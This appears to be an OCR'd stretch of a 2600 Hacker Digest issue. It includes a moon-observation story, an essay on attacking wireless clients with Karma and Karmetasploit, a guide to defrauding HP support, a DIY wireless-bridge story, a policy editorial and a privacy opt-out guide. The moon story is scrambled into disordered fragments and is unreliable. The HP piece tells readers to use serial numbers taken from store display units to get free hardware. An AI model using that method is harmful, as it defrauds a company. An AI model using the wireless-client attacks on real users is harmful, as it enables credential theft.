I've read that the dark areas are due to different types of soil deposited by meteors. When viewing the moon up close with this lens. In the meantime. what was it? Surely that telescope instruction wasn't just to keep me from aiming the high-power lens across town at the girls' dorm windows. The 'only' could have caught my attention. at least. of course. That seemed a reasonable statement. utilizing such a tool to observe the moon requires extraordinary patience. I took every lens I had. Regarding the highest-power lens. must. that tingling feeling between my ears. I almost had it... using duct tape and\ glue. The piles were in small groups. the first thing I did with my telescope is pop in the so-called deep-space lens and stare at the moon. with maybe fifteen beams in each pile. Contrary to the documentation. And that's after you finally get it into focus! But. It then went so far as to say that looking at nearby objects such as the moon with a high-power lens would be boring. though. I observed formations that didn't look like something that would occur naturally. The suggestion didn't end there. They've been there — surely they'll have photos of some of the things I've just seen... but all of his incoming email is about to get forwarded to the girl he listed as his girlfriend. of course. about. the only civilian. it becomes a continuous battle to keep the moon within the scope. I've just Googled that guy still living in that same small town in Missouri. it. One of these days you'll see one of the endless possibilities will rise majestically to the top. So.. they also showed no trace of color (other than gray).. When viewing the moon with the naked eye. Nope. If it bothered them for me to use a high-powered lens to look at the moon. with the exception of numerous lava-orange ridges that ran across the surface. it wouldn't let go.. To me it looked like water. I had to know why. the earth's rotation is hardly noticeable from one second to the next. I read it was for deep-space only.. stop. formed a tube of lenses approximately two feet long. Am I the only one. Facebook and MySpace are wonderful things. And I'll know. Where does the blue color go when viewing the moon through a standard telescope? With multiple lenses combined. why would anyone discourage someone from looking at the moon with a high-power telescope lens? It bothered me to the point that.. combined with a doubler and even a tripler lens and. I wondered even more so why a telescope company would dissuade people from taking a close look at the moon. Isn't that sort of like suggesting how boring it would be to turn your cell phone on at 39. Not only did NASA's photos not reveal any of the odd structures.VOLUME 26
The instructions gave a brief description and use for each lens included with the telescope. but for all I knew it was written in a foreign country and it's common for extra words get thrown in that way.. you see some bluish colors. and the rest were sort of a beige-rust color.000 feet? The feeling wouldn't let go. you suddenly realize the science teacher back in high school didn't quite teach you everything. I observed only a few groups of these formations. to have seen what the surface of the moon really looks like up close?! I wake sometimes. the blue vanishes into a monotone gray. I was able to focus the colors back in and found that the moon has at least three distinct colors. the first thing I wanted to do is take a look at the NASA website. The ocean-blue areas have craters. When you look at the moon with the naked eye. satellite photos of the moon. And she doesn't know it yet.. I browsed through thousands of NASA moon photos and saw nothing even close to what I'd just seen through my telescope. The edges of most of the craters (outside of the ocean-blue areas) were bright lava-orange. but they were clearly seen to be set in oceans of solid ice... Also. the question kept running through my mind. even using some extras I found at a garage sale. and watching the discovery channel for answers. but what did I know? After all. What's the deal?! I spent the next few weeks researching the moon landing... thinking. Not even fully recovered from the surprise of seeing colors and shapes on the moon. Or maybe you skipped class that day. I found looking into the craters on the moon pretty exciting! It instantly became my favorite lens.
40
. when you look at it with a regular telescope. I decided to take it a step further. I've been told the dark areas are shadows.. The darker areas I saw with the naked eye were once again an ocean-blue color when viewed with the "super lens". Oh boy —the three questions hitting me all at once. Just as it is in hacking technology. staring through dark air with the hairs on the back of my neck on end.. They appeared to be piles of rectangular beams. after exhausting all efforts to find anything out of the ordinary with the high-powered lens. though. when in focus and keeping a rhythm with the scope's movement on its tripod and the earth's rotation.THE HACKER DIGEST ..

And yes. Karma. they will choose the worst. Many versions of Windows will even create an ad-hoc network of the same name if they can’t find the one they want to join. we know these things are weak. they may notice the “Joined Network” pop-up from the network manager. I am your POP3 server. “Free Public Wi-Fi” and “HP Setup” are some of the most notable. most destructive answer. Patches to the Madwifi drivers. Demonstrating WEP breaking on yet another network is boring. which implies their systems are completely up to date and the tools present the users with proper information. or the userspace airbase-ng from the Aircrack suite automate replying to every query. This. not every wireless management program defaults to making an ad-hoc network.THE HACKER DIGEST . By now. Why is it so easy to attack clients directly? Client security is almost entirely in the hands of the users. What’s the first action taken by clients after getting an IP? Checking for updates and connecting to
41
. sometime in the past. come on in. Users are notoriously bad at making good decisions about security. There is no reason for the OS to present the user with an alert. or New York. and we’re just making ourselves hoarse cautioning everyone about them again and again. country. As far as the client is concerned.. or the user to suspect anything is amiss. Yet another brute force SSH worm? Yawn. Connecting to a user away from home is as trivial as it gets. or Copenhagen. Are you “Free Public Wi-Fi”? Yes. why not.but now it’s a replicating ad-hoc network. assumes the user is even given the opportunity to make the right decision. it’s necessary to assume that in any situation where the user is asked a question. Joe Random User thinks.. The insidious part of these attacks is that the user never knows it’s happening. The latest PHPBB exploit isn’t interesting. Controlling layer2 means controlling everything the client sees.” and is now another system with the “Free Public Wi-Fi” ad-hoc network in their preferred list. and fellow hackers for years. Somewhere. Are you “My Corpnet”? That too. advertising it whenever they go somewhere where there are no other preferred networks. or Chicago. When the Wi-Fi is enabled. We (myself fully included) have been parroting the same dry warnings to customers. of course. or even world advertising where it came from and what it would like to talk to? All the corporate firewalls in the world won’t do a lick of good when the client is connecting to “Free Public Wi-Fi” at an airport in San Jose. the network is operating as expected. “I like free. media. city. yes I am. most systems look for preferred networks (or just any network they’ve ever connected to before).VOLUME 26
Transmissions
by Dragorn
I’m going to risk making a potentially bold statement: Servers and networks are getting boring. who are you and would you like to tell me your password? It gets worse: Configuring an ad-hoc network for every client looking for a network is boring. leading to viral wireless networks which spread worldwide. Besides. Are you the random garbage Windows Zero Config spews? Sure. Too bad the ad-hoc network doesn’t go anywhere. there was a real network called “Free Public Wi-Fi” . So bad.. Oh wait.. here’s an IP. since no one is providing DHCP service. I like Wi-Fi. What attack surface happily extends itself beyond the corporate firewalls onto untrusted networks? What wanders around the town. If a user is particularly alert.

Even undisguised channels can often go undetected. It continues to get worse: Why bring up a fake network when an open network is just as good? Despite being several years old. An attacker can inject images to exploit known browser vulnerabilities. Airpwn is still relevant. 1900-2000 ET WBAI 99. a user doesn’t stand much of a chance. Many popular sites support SSL for login. most likely. Protecting clients outside of the sheltered world of the firewalled intranet will continue to be a major challenge and vulnerability for some time to come. The insidious attack path is to install sleeper software. When IP allocation. Even if the rest of the site is encrypted.
BROADCAST FOR ALL THE WORLD TO HEAR
and at http://www. or timing. by spoofing network services and capturing logins or by sniffing unprotected plaintext. what can actually be done to fix the problem? The simplest method for protecting clients is to turn off the radio when not in use.
42
but then serve the normal site over standard HTTP. and force the use of VPN for any sensitive content. But let’s be real: That’s not likely to happen in most situations. Overwriting (or appending to) a trusted javascript file allows execution within the same trust region as the website.com/offthehook over the net
. it can be substituted with hostile content.
THE HACKER DIGEST . So after all the doom and gloom. any time content is loaded unencrypted (such as ad content for images).email.com with your comments. The web browser security model expects that code loaded by a page is allowed access to the page (cookies. It gets even worse: Spoofing all these services for every client you’ve attached is tedious. Why spend the time focusing on clients? The simplest case gets credentials to the protected network. not prevent traffic from leaving. etc. DOM. client security is in a bad place. New York City
Call us during the show at +1 212 209 2900. Email oth@2600. DNS queries. maintain patch levels at all times. uses a spoofed DNS server to alias all remote hosts to itself and brings up a web server serving browser exploits directly to the client. Until the operating system and user tools become simple enough to allow novice users to defend themselves.). exposing session cookies and content. right? Isn’t there a simpler way? Yup! Karmetasploit. The Evilgrade toolkit performs similarly for trapping unprotected or unauthenticated automatic upgrades from assorted software packages. a combination of Karma/Airbase and Metasploit. http queries.VOLUME 26
OFF THE HOOK
Wednesdays. Developed to inject goatse into browsers at Defcon. or rewrite included javascript files to alter the page within the browser.2600. and all other network access is controlled by the attacker. it demonstrates the ability to inject content into an otherwise trusted browsing session. Firewalls are usually designed to keep traffic out. never mind stealth channels using encryption.5 FM.

This person is the bottom of the barrel.
Cable to make sure that Road Runner was available in the area we were building. If your battery is bad. If you request to speak with a case manager. Other non-exchangeable parts are headphones. I personally was on a call where a man was sent a new computer because hecould not remember his AOL password and blamed HP for it. it should not be a problem. The caller is then connected to a live call router. If you do not return it. If they take this course of action. At this point you are routed to the next level of support. they send you a FedEx label to return the “defective” product. the money saving system of IT and customer service outsourcing has its weaknesses that can be exploited. and extended warranties. Have fun. Use your imagination and you can exploit them. and pretty much anything that comes in the box with the system. First let me address the usual protocol when you call HP for technical support. I decided to call TWC once again to find out when I could get Road Runner installed. While building the house was challenging enough. it will never look suspicious in the system. the agent is required by company policy to honor your request. Calling for help is taking a gamble on who you will be connected to and. Luckily. and is generally in India. where you will be connected. HP sends out two types of replacement parts. finding an ISP that offered high speed Internet in my area was my greatest challenge. since you are giving an alias with serial numbers you took down from store display units. TV tuners. we were breaking ground on what would become the greatest struggle for high speed Internet that I have ever experienced. South America. other than the battery. without taking a credit card number and without the need to return the old part. The tech support rep will ask you for your case ID number. You call them and provide them the serial number and.THE HACKER DIGEST . This gave me a feeling of relief. The best part about this is that you can request tons of this stuff and they will never bill you. the end user. The main weakness of this system is that they will log virtually anything you tell them into HP’s support software. more importantly. the serial number of the product you are calling about. Before we even broke ground. like an AC adapter. The call router will ask you for your basic information. as far as support reps go. verify your information. happy. replacement computers. even though the original owner’s information will pop up. and a brief description of the issue you are having. These are the top of the food chain as far as support goes.
The L a s t 1 0 0 0 Fe e t
by b1tl0ck
It was April 2003. I was informed “Yes. which is going to either be India. Their only job is to make you. But a nonexchangeable part. Another weakness is in getting replacement parts.VOLUME 26
Social Engineering HP for Fun and Profit
by haxadecimal
We all know how bad HP support is. And. and are authorized to provide you with free upgrades. Say you purchase a used computer and need help with it. they will either immediately transfer you or schedule a call back. these are all outsourced companies and not HP. will be sent free of charge. they will send you a new one with a return label to send back the old one. they will charge your credit card for the replacement. exchangeable and non-exchangeable. Yet another weakness they have comes from the use of outsourced case managers. They are also required by company policy to offer to sell you something (usually an extended warranty) and give you a case number before sending you off into the actual technical support queue. and then proceed to troubleshoot or assist you with your issue. When the house was about finished and our phone number was assigned. The end user dials the toll-free number and is dumped into an automated system where they choose what kind of support they need and what type of product they are calling about. Canada or the USA. This means that you can go down to your local mega-mart and jot down some serial numbers and start having some fun. I called Time Warner
43
. they will still add you as the current user/owner so that you can receive support. free software. It is not unusual for a case manager to simply send out a replacement unit to keep a caller happy. Once again. and it was confirmed that I could indeed get Road Runner based on the phone number of a house in the area we were building.” I followed this call up with a visit to the TWC website.

I enjoy broadband as much as the next person. went home. he was a bit skeptical. Thank you for reading and I hope that this story inspires you to keep going when someone or some company tells you that what you want to do isn’t available or possible. meaning they are very nice. I set up the other WAP11 in bridging mode. Experiment with better hardware & software firewalls to replace the Internet-facing router in place today. configured the devices. This route would be difficult because the distance between the houses is greater than the maximum distance recommended for CAT5e. I measured it out. around May 2006. it’s about a quarter mile). but I was not about to pay that kind of money for it. there have been sporadic hardware issues with the Linksys devices I used. Yes. This would need some sort of repeater/signal amplifier in between. WAP54G was not one of them. which would require power. In a state of disbelief. One nice thing about the ISP being local is that they don’t mind me doing what I’m doing.5Mbps down and 384kbps up with the service I subscribe to. I told him I’d simply paint the antenna to match his house. there’s no hurry. which fed all of the network jacks in my house. At the in-laws’ house.946. I could see the water tower from their front yard. DHCP was being served from the in-laws’ house via a relatively inexpensive router. After troubleshooting. I had my antennas on order. They came out and installed their antenna and radio. but where’s the sport in that? Another item to mention is that between our houses is a fairly thick tree line. There was a contact person and phone number listed on the letter. and that I would need to cover the remaining $38. and his house was brown. You’re the one with the wireless between the houses”. Being in the IT industry. and they’re on a hill. I couldn’t see the water tower from my house… Then. A few websites and phone calls later.
44
. Swapping out the antennas for newer equipment. and within 20 minutes was back up and running. antenna for the in-laws’ house. the day came. I decided to look for a more ‘grass roots’ type of establishment. with the cable of the omnidirectional antenna plugged into the left antenna. The person said that the company writes letters like that on occasion and that nobody had taken them up on the offer to date. I raced up their driveway and. In the basement of my house. 2.) I purchased two WAP54G devices for around $79 each. yagi style.” Even if I didn’t. through a closet in the bedroom. I know I could invest in some higher-grade equipment. that’s what Google and smart friends are for. it was enough cover to hinder the signal strength. I know enough about wireless communications to ‘shoot’ the signal from the in-laws’ house over to my house. 3. I had a few ideas for where I could find the goods I needed.VOLUME 26
During this call. when their antennas on the water tower are acting up). My house had to be within line of sight of the water tower located about 5 miles away. actually. The RJ45 jack on the back of the WAP11 in my basement fed into the ‘source’ port on my main switch. I had a ‘eureka’ moment. but there was a catch. I called the ISP and signed up the in-law’s house. Hi <insert my name here>. I won’t go into the technical specs of each antenna. After three years of reliable service. The first local ISP I called had been around for a long time in the town where I live. and my antennas arrived. A feeling of sorrow came over me. The results of the site survey concluded that they would need to extend service 8850 feet to provide service to my house. I’ve replaced each access point in my system twice since 2003. I realized that it was going to be a losing battle. For the first couple of years. The letter indicated that TWC would cover $1800 of the project. Not only because he thought I was nuts for going to all this trouble for Internet. I had purchased an omnidirectional antenna for my house and a directional. I decided to call this person to find out if I was expected to pay that amount for service. After reconfirming that it was not available. My in-laws live just a stones throw away from my house (well. I was informed that Road Runner was not available for my house. Some of the things I’ve been kicking around for future improvements are: 1. but it was a learning experience for me as well as a fun project.THE HACKER DIGEST . I needed the equipment to make it happen. each Mother’s Day the Internet connection would go flakey. I get the usual greeting of “Oh. My ears perked up a bit when I was talking to the tech guy about it. but I’ll say they are commercial grade. the WAP11 would only communicate with a few other Linksys devices. When I showed my father-in-law the antenna that I wanted to mount on the front of his house. I thanked her for her time and politely declined their services. I cut a hole into the wall behind a shelf in the closet in order to climb out into the soffit area to pull the cable through. but also because the antenna was white. Bury a cable between the houses and sever the wireless communications. and connected to the left antenna jack of the WAP11. (While in bridging mode. the wireless connection between the two houses became flakey and unreliable. I scurried up to my rooftop to see what I could see. Having dabbled a bit in wireless ‘cantenna’ building. I asked the person to check again. Whenever I call the ISP (usually after a big storm. we’ve made sure there is a large enough hole in the tree line that we won’t have to worry about the degraded signal for a few more years. I also purchased two Linksys WAP11 Access Points and a standard four port Linksys router from a large electronics store. but if it isn’t broke. and they had just started providing a wireless broadband service. I’m getting 1. in fact they donated a couple of antennas to my cause the last time they came out to see me. Their house was now hooked up. I mounted the omnidirectional antenna on top of our TV antenna and purchased 50 feet of heavily shielded cable with TNC connectors. and he was on board. I narrowed the issue down to bad hardware on one of the WAP11 devices. I went back to the large electronics store only to find that WAP11s had been replaced by WAP54G device. The hunt was on. and it was about 1000 feet (line of sight) from the corner of their porch to the back corner of my house. After calling all the major broadband providers that I could find. Finally. like clockwork. they offered to perform a site survey to determine why exactly they could not provide Road Runner to my residence. Don’t get me wrong. what do you know. After investing in a tree saw. Since May 2006. I thought to myself “I can make this work. Turned out that when all the leaves grew back on the trees. the directional antenna was mounted on the corner of the porch and a cable was run up through the soffit. I then drilled two more holes and mounted the cables nicely into the wall. Not the fastest connection in town.

promising. And either a brand new approach is tried or we fall right back into the same old habits. running up credit card charges. CALEA. It basically puts control in the hands of the users and prevents broadband carriers from discriminating against certain competing applications or content. stealing and destroying information. In this administration we saw more clampdowns and imprisonments of individuals for nebulous computer-related crimes than ever before. But we’re not so naive as to think that there won’t be contradictions and exceptions invoked that will anger us down the road. Net neutrality is strongly opposed by the communications giants even though it’s how the Internet has worked from the start.” So far. we at least have the potential of getting it right. This threat was overshadowed by the attack and wanton disregard of everyone’s civil liberties in the name of national security. 2001. Obama’s position on this remains unchanged as of his May 29th remarks: “I remain firmly committed to net neutrality so we can keep the Internet as it should be . really the first administration with any sense of computers and connectivity. Which is why our vigilance on these matters is especially important. Rather than foster transparency.
As expected. Clinton pushed for more control and surveillance under the name of such horrors as the Clipper Chip.VOLUME 26
The Not
emy En
Any time there’s a new administration in power. Remarks made by Bill Clinton in 1999 on the subject of “Keeping America Secure for the 21st Century” included this gem: “Last spring. and the Communications Decency Act. by extension. Hardly an enlightened approach. we saw the enormous impact of a single failed electronic link. and television networks all around the world. The recently released Obama initiative on “cybersecurity” could really go either way at this point. credit card systems. And sometimes both of these happen. In the Clinton years. the seed was planted in many that hackers were the enemy. We saw the usual exaggerated statistics to make the public scared of the hacker threat. Again. There will be tremendous pressure to stray from this path and it’s up to
45
. full disclosure. Education gave way to crackdowns and prosecution.open and free.hackers break into government and business computers.THE HACKER DIGEST . he seems to appreciate certain aspects of it that those in power frequently don’t get. The concept of network neutrality is one shining example of this. If promises of dialogue and openmindedness are held to. Let’s look at policies of the past. a lot of potential was lost because common sense was sacrificed to shrill headlines and a sense of panic. not much changed in the Bush years. extorting money by threats to unleash computer viruses. ATMs. leading many to conclude that true change is nearly impossible to achieve. So now we have a president who likely understands the Internet better than any of his predecessors. It’s next to impossible to have this much power and hold onto these lofty ideals. In the period following September 11. Hackers were still seen as a threat but now there were so many perceived threats that it wasn’t too difficult to prove how ill-conceived the policies were. so good.” By portraying hackers as sociopaths and by linking them even indirectly to massive technological failures.disabled pagers. More importantly. raiding bank accounts. This is also an administration that supports. at least on paper. the idea of open source software and. we’re likely to see a renewed effort to address certain problems. And we already are seeing the first wave of deliberate cyber attacks . when a satellite malfunctioned . there were serious fears that the newly formed Department of Homeland Security would treat hackers as if they were equivalent to terrorists. But there are still enough troubling signs overall for us to be seriously worried.

We see how society has changed so that these interests (computer access and free communications) are now encouraged. our ideals have a chance of surviving and many of our nation’s brightest could help steer us in the right direction. Already. We’re quite pleased to see no mention at all of hackers in the main report. Not so long ago. increasingly. but Obama’s spoken remarks weren’t as tempered.
46
. the media has created the perception that anyone causing any sort of mischief on the net or involving a computer is ipso-facto a hacker. But they’re clearly not and a mere look at the constant dialogue that runs through our pages will show any outsider just how seriously true hackers take this sort of thing. We will preserve and protect the personal privacy and civil liberties that we cherish as Americans. profiteers. whether it be on an insecure website. Often they enjoyed and understood the systems they were using far more than the legitimate users and they frequently went on to design better ones. Referring to his own experiences during the campaign. But a “lone hacker?” This is now by default a bad thing? We prefer to think of a lone hacker a thousand miles away as a beam of light and quite possibly the person who can help to find solutions to the very same issues being discussed here. they are only words. it was impossible for most curious people to play with a UNIX machine without breaking into one. organized crime. Communications once were so prohibitively expensive that manipulating one’s way around the Bell System was almost a necessity for those who simply wanted to stay in touch and share information. foreign intelligence services. to name but a few. Does this make them hackers? We also see almost daily instances of nonexistent security where thousands or even millions of personal records are left wide open for anyone to stumble upon. What disturbs us in Obama’s cybersecurity plan is the continuing jingoistic approach to the perceived hacker threat. from policy position papers to travel plans.THE HACKER DIGEST . “Between August and October. let alone that they were hackers. vandals. the Obama administration has opted to protect the NSA’s warrantless wiretapping program in the name of national security. Hackers will figure things out. will not include . or attempt to cause mayhem through viruses and worms. They will tell other people. the lone hacker a thousand miles away. They are the epitome of the open environment that Obama claims to support.the disgruntled employee on the inside. But what we should expect is for distinctions to be drawn between this sort of thing and the antics of idiots. particularly one that was obviously so high profile. the industrial spy and. ironically. They are not the miscreants who profit from corporate espionage. hackers gained access to emails and a range of campaign files. This is a surefire way to not only lose the battle but to lose a generation of innovators and freethinkers. By simply awarding any evildoer with a keyboard this title. “Our pursuit of cyber security will not . the threat is deemed to be the “hackers” even when no evidence exists that anyone at all even accessed the information.VOLUME 26
all of us to ensure that mistakes of previous administrations aren’t repeated here. Over the years.” As most of us who read these pages already know. That’s when we see if they remain only words. Troubling signs like this make us all the more wary of any promises.” It’s easy to see the negativity in just about all of these entities. they will be tested at the first sign of a crisis. etc. leads those very individuals who participate in this sort of destructive behavior into proudly labeling themselves as hackers. This. While mischievous and not completely within the confines of the law. Many hackers do step over the line. he says. We want to be very clear on this. when these egregious violations are eventually uncovered. We have seen numerous examples of employees within organizations (phone companies. Yet. Just because they use the technology does not mean they appreciate it or comprehend it for anything more than their unimaginative goals. “But every day we see waves of cyber thieves trolling for sensitive information . or even in a garbage dumpster. such people were never malicious or destructive. at the moment.monitoring private sector networks or Internet traffic.I repeat. We know that many people have a problem with those who step outside the rules and we don’t expect ringing endorsements of their behavior. Internet providers.” These are indeed great words but. a misplaced laptop. Without any doubt. Done properly.) who abuse their access and violate privacy. send out a universe of spam. Terms like “digital war” and “cyberterror” are great for sound bites but we need to avoid the tabloid approach in strengthening security or we’ll inevitably wind up with ill-conceived legislation and a lot of misplaced fear. it doesn’t take a hacker to gain unauthorized access to a system. we wind up giving them far more credit than they deserve and the people with the real talent are themselves categorized as criminals. and con men who have always existed and always will.

TransUnion. go to http://www. or a completely false name. It should be noted that telemarketers are not allowed to call cellular phones. To stop receiving these “pre-approved” credit card offers. It is an added layer of protection.. Though I do not condone using such sites. This article will not only help you cut down on the amount of junk mail you receive.” While your circumstances may require that you wish to remain undetectable to government entities and private detectives. as grown and educated adults. The national Do Not Call Registry was established by the federal government to allow consumers to “opt out”2 of marketing telephone calls. are kind enough to allow you to “optout” of the sale and sharing of your private information. a nickname. The problem with many other privacy articles is that they do not see the forest for the trees. Businesses are not “consumers. Are you tired of all those “pre-approved” credit card offers in the mail? The three credit reporting bureaus.gov. Even with these exceptions. full birth date. With only a name.THE HACKER DIGEST . you will still be able to stop many annoying and untimely telemarketing calls. The Do Not Call Registry does not apply to businesses. you at least have some degree of control in terms of who has access to what information. and charities/political organizations. OR phone number I can use the Internet to find your legal name. There are a few exemptions from this registry: surveys. but will have no redress against telemarketers if they do call you. if you choose to register your cellular phone. however. When giving your name and address to the government. Please do not misconstrue anything in this article to promote such a callous disregard for the government or the courts. You will need a valid e-mail address to complete the registration process and may enter up to three phone numbers per registration.VOLUME 26
Regaining Privacy in a Digital World
by 6-Pack
You would probably be surprised at how much information about you is available to anyone with an Internet connection. Now. Therefore. with only a little bit of work. however. talk to strangers all the time by filling out online forms. or defrauding the government is illegal.com and follow the instructions
The Do Not Call Registry
Opt-Out Prescreen
47
. you will land directly in jail. however.donotcall. Lying. you can register your business phone numbers to eliminate unwanted and unproductive telemarketing calls. Internet forms and databases do not care which of these “names” you provide them. you can regain some tranquility in your life. even five-yearolds know not to talk to strangers and yet we. Experian. history of all prior residences. It will save you a lot of trouble. businesses you have an established relationship with. and Equifax. although the enforcement only applies to consumers. OR address. I’m not speaking about the data you advertise publicly on sites such as Facebook or MySpace.”1 You may have a birth name. as long as you provide them something. Why not start using a nickname or false name when filling out online forms? After all. but it will also make it harder for the average person to track you down. family members in the same household. They advise you on how to make it difficult for the government and private detectives to track you down. but do not tell you how to make it difficult for “Joe Six-pack. To add your phone number to this registry. aren’t the majority of stalkers just your average Joe? For starters. misleading.optout ➥prescreen. etc. businesses may still register their phone numbers. get an unlisted phone number! The additional $2 a month is not a large sum of money considering the additional privacy benefits of having an “unpublished” number. give the correct one. most of us do not require this level of privacy.. Remember. No passing Go.”3 From my understanding. What is in a name anyway? Webster’s dictionary defines “name” as “a word or symbol used in logic to designate an entity. After all. go to http://www. however. that an unpublished number will only stay private if you keep it private! I will only say this once: do not lie to the government.

people. Then go to http://switchboard. Then go to http://www. ➥acxiom. Call that number from the phone number in the listing and you will be removed. I will not describe each site in detail but will just give a quick description and explanation of how to remove your information. anywho. They claim that it takes two weeks to process your request. Then go to http:// ➥yahoo. like myself. I also recommend against filling a form with more information than is available on the website in the first place. run-of-themill junk mail. Axicom will send you a package in the mail (mine arrived within a week) that contains the actual “opt-out” form. Go to www. simply remove yourself from their databases: Axicom Much like the “pre-approved” credit card offers mentioned above.com/ ➥optout. Once you find your listing.” switchboard. who then send you junk mail.” Enter the code word and click “remove me.” Click that button.intelius.com/optout.com. Do not delete this information! Scroll down to the bottom of the page and follow the link to the “online removal form. and whitepages.php. Fill out the form and mail it back to them. most likely 1-732-9785000. whitepages. ➥ anywho.php. “Is this you? Remove your listing.VOLUME 26
to “opt-out. and when you typically make those purchases. click on “update listing” under the address shown. are tired of receiving advertisements for products that are uninteresting and leave you wondering how you were lucky enough to be selected for such a fine excrement of mailings in the first place. To “opt-out. Remember to check back and renew your “opt-out” every few years.THE HACKER DIGEST . enter the reason for removal (it doesn’t really matter what reason you choose). They sell your address and provide your likes and dislikes to advertisers.com. ➥html and fill out their form. and your listing will be removed. They expanded to cover individuals as well. how often you purchase it. Three companies alone have the ability to stop the majority of junk mail you receive! To thwart would-be junk mail. Choicepoint Choicepoint sells your address information much like Axicom.”
This section focuses on regular.superpages. An identity thief can easily open your mailbox and snatch these offers while you are not home. go to http://www. fill the form out with the information contained in the listing. 411. I recommend using a disposable e-mail address (such as from Yahoo! or Hotmail) so that you won’t get bogged down with spam to your main e-mail address. For example.dmachoice. because this option does not require your social security number. The Direct Marketing Association (DMA) The Direct Marketing Association (DMA) is reason number two your mailbox gets cluttered with junk mail.person.com Find your listing.priva ➥cyatchoicepoint. Many people do not realize the security implications of these credit card offers.intelius. To “opt-out” from Choicepoint’s services.com/optout_ext.com Search for your name and click on it in the results. You should definitely “opt-out” from this service!
How to (Not) Find a Person on the Internet
I previously discussed how easy it is for Joe Six-pack to locate you and your loved ones.aol. About halfway down the page you will see a small link that says. fill the form out with the information contained in the listing.yahoo.com.
Marketing and Junk Mail
48
.com The Superpages are no longer limited to businesses.” go to http://www.org to find out how to remove your name and address from DMAapproved marketers’ databases.intelius. Now you will learn how to fight back and regain your independence from the commercial sale of your private4 information. Why take the risk? Besides.com Find your listing. The system will then generate a number.” I recommend using the electronic opt-out that is good for five years. and click “remove me.com Find your listing. I’m sure that you.com/opt-out-request-form and fill out the form listed on that page. phonenumber.” find.com/help/privacy_list. enter the security code. html and enter the phone number that was contained in the listing. and click “remove me. How do they gather this information? You know those barcodes you carry on your keychain (grocery store clubs and the like)? These stores keep tabs on what you buy. Now you know why grocery stores are insistent that you use the free club card to receive 15 cents off your box of cereal. Axicom sells your information to marketers. do not give a laundry list of previous addresses if a site’s database contains only few of your old addresses. I end up shredding all of these offers to make sure no one can misappropriate them for their own illicit use.

Using the same $50 disposable Visa as described above. c o m / c o n s u m e r / o p t o u t / s u b m i t
➥Optout. Open a new window. Follow the instructions to remove your information to the tee. Therefore. go to http://www.ussearch ➥. you were most likely talked into joining classmates. so don’t expect overnight results. friends. and relatives with the single $19. I would recommend bookmarking all of the sites mentioned above and checking back on them every so often to delete any data they may have put back on because you failed to “opt-out” from other services along the way. I noticed they had variations of my name at the same address. But then again. Using the same procedure.usps.daplus. if it doesn’t show up in one of their listings. Their fax number is: (425) 974-6194. they only accept your opt-out via fax. Go to http://poboxes. it doesn’t lead to where you live. so now you have hopefully removed your private information from the Internet.php (I have excluded the option of paying ZabaSearch $20 to block your record instantly because you can do it for free through the mail). They will remove your listings within a few days.95.com/optout/optout.com/po ➥boxonline/search/landingPage. open a new window and go to http://www.us Search for your name and look through the second box to find your listing.THE HACKER DIGEST .VOLUME 26
zabasearch. This way. I searched for everyone I knew to get the most out of my hard-earned money.com If you were like me. the grocery store coupons mentioned above.com/ ➥block_records/block_by_mail. Read all of the checkboxes carefully because one of them is an opt-in for e-mail advertisements. This service may not apply to you. classmates. you have two choices for removing your information: 1. Go to http://www. it leads to the post office. Before undertaking this. but. I subscribed for their 24-hour unlimited pass for $19. Currently. Open a second window and go to http://www. reversephonedetective. Mail the forms to: Attn: Opt-Out Department Service Center 600 Corporate Pointe. ussearch. I did find my brand new post office box attached to my name. so fill out the form multiple times to include all variations.do and search for available PO boxes in your area.us/ ➥remove. intelius.reversephonedetec ➥tive. utility bills.aspx for details. go to http://www.com Enter your phone number and see what information comes up.com This website is not as easy as the others. I used this for the sites I had to subscribe to because I do not want them having my real credit card information. if it does. or they will reject it. Open a new window and go to http://www.do. PO Boxes I recommend getting a PO box for magazine subscriptions. From now on. However. CA 90230 2.zabasearch. I’ll bet that they don’t have it. Any available boxes will include the various sizes and prices. It takes them a while to remove your information. we did remove the information from the hands of the majority of the non-paying public. I went to the local drugstore and purchased a $50 “gift” Visa card. Aside from the daily junk e-mails. I subscribed to the 24-hour unlimited pass for $19. when I was removing myself from the databases mentioned above. daplus. Suite 220 Culver City. Fax the forms to: (310) 822-7898 It takes US Search a while to remove your listing. Now. most sites that have your information are pay sites and only the most persistent of people will want to pay for your information. which is impossible.
Ok. and anything else that will likely be sold. All they require is that you print off the listing and send it to them. Once you find your listing. this service has done nothing else for me other than share my name with others (I never filled in the address part).com/privacy.95.aspx and fill out the form with your information. I rented the cheapest box available and it was only $58. so don’t expect results for at least a week. Interestingly. people shouldn’t be attracted to you in the first place.com Here is the tricky part with Intelius: you must subscribe to their service to print the listing to remove yourself.com so that you could keep up to date with class reunions and such.com The removal process is much like for ZabaSearch.95. if you are living a low-key lifestyle. While we did not remove all of your information from the Internet. I could search for all of my family.peoplefinders ➥.
Regain a Private Lifestyle
49
. I only included the address information that they had available on their website. The post office is not supposed to divulge who the renter of a PO box is unless there is a court-issued subpoena or search warrant.class ➥mates.php. This is the importance of having mostly everything sent to your box: Anytime someone does sell your information. you must subscribe to their service to print the listing to remove yourself. They ask you to include address information going back 20 years but.com As with Intelius.00 a year. peoplefinders.com/cmo/user/remove to remove your account. and fill out the form. PO boxes range from $20 a year (zip code 48820) for the smallest box to $667 a year (zip code 90210) for the largest box.

VOLUME 26
When you go to the post office to get your new “box o’ privacy. such as some mom-and-pop CB radio outfit. if we don’t tell companies that we feel this is wrong. 4. and never giving up your real address and phone number to “strangers. like Sears or Macy’s). you must have previously registered for a service. Use your PO box! It is sad that society is forcing us to spend our hard-earned money to “opt-out” from services we never elected to enroll in. When filling out the form. I feel. you must remember to use your PO box! Absolutely do not use your home address unless the government or a bank is requesting it. fast. it’s best to order an obscure catalog that they have not likely heard of. Companies only know what you tell them (or what they have purchased from others whom you have told). and pressing a couple of buttons. Box 143 Anytown. Now. but I’ll still use the quotations. fast. For example: Joe Six-pack 123 Postal St. using fictitious names when subscribing to magazines and receiving packages. and other financial institutions to have a physical street address for you. entering some identifying information. we have all gotten lazier and we want our information quick. you should provide your actual street address.” (Black’s Law Dictionary. and unscrupulous tactics that make a them a quick dollar by: removing your listings from online databases. Let’s face it.” (For this excuse to work.” you will need to present two forms of identification. Tell them you are tired of their invasive. address. 2006).” I feel that if you wish to opt-out of a service. just order a few more that way to make sure the post office doesn’t complain after the first few. and you are all set. Now for my trick around street addresses. a $2 security deposit on the keys. Remember. Your banks have to tell you how to do this. It usually involves calling a phone number. there is nothing private about your name.com/ ➥dictionary/name 2. though. 3. and easy. This is the same definition that is used in federal consumer laws. and easy (isn’t that the Internet?). The reason I feel there is a 